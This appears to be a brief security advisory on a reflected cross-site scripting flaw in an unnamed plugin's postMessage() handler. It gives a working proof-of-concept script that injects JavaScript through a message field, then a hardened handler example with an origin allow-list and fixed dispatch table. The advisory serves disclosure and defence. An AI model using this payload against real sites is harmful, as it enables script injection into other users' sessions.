The plugin was affected by a Reflected Cross-Site Scripting issue via the postMessage() event.
Use the following code on another website:
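<script>
// Open the vulnerable page in a new window so messages can be posted to it
var popup = window.open('https://VULNERABLE.PAGE/');
// Message whose "method" field holds the JavaScript payload
var msg = {};
msg.method = "alert(document.domain)";
// Target origin '*' is used; resend every second so the message arrives after the page loads
function post() { popup.postMessage(msg, '*'); }
setInterval(post, 1000);
</script>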
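
The mitigation side of this issue, as an added example (not the plugin's code): a message handler that checks event.origin against an allow-list and dispatches the method name through a fixed table instead of executing it. The trusted origin, the action names and the assumption that the affected handler ran msg.method as code are illustrative and not taken from the plugin.

```javascript
// Added example: hardened "message" listener logic. All names are hypothetical.
// Assumption: the affected handler treated event.data.method as code to run.

const TRUSTED_ORIGINS = new Set(['https://app.example.com']); // constructed value

// Fixed table of permitted actions; created without a prototype so names such
// as "constructor" or "toString" cannot resolve to inherited functions.
const ACTIONS = Object.assign(Object.create(null), {
  resize: (args) => ({ action: 'resize', height: Number(args.height) || 0 }),
  close: () => ({ action: 'close' }),
});

function handleMessage(event) {
  // 1. Reject senders that are not explicitly trusted.
  if (!TRUSTED_ORIGINS.has(event.origin)) {
    return { ok: false, reason: 'untrusted origin' };
  }
  // 2. Require a plain object with a string method name.
  const data = event.data;
  if (data === null || typeof data !== 'object' || typeof data.method !== 'string') {
    return { ok: false, reason: 'malformed message' };
  }
  // 3. Look the name up in the fixed table; never eval() or new Function().
  const action = ACTIONS[data.method];
  if (typeof action !== 'function') {
    return { ok: false, reason: 'unknown method' };
  }
  return { ok: true, result: action(data.args || {}) };
}

// In a browser: window.addEventListener('message', (e) => handleMessage(e));

// Constructed sample events, shaped like the message in the proof of concept.
const samples = [
  { origin: 'https://other.example', data: { method: 'alert(document.domain)' } },
  { origin: 'https://app.example.com', data: { method: 'alert(document.domain)' } },
  { origin: 'https://app.example.com', data: { method: 'resize', args: { height: 300 } } },
];
for (const s of samples) console.log(s.origin, s.data.method, handleMessage(s));
```

The second sample shows that the method string is rejected even from a trusted origin, so a compromised or framed trusted page still cannot inject script through this channel.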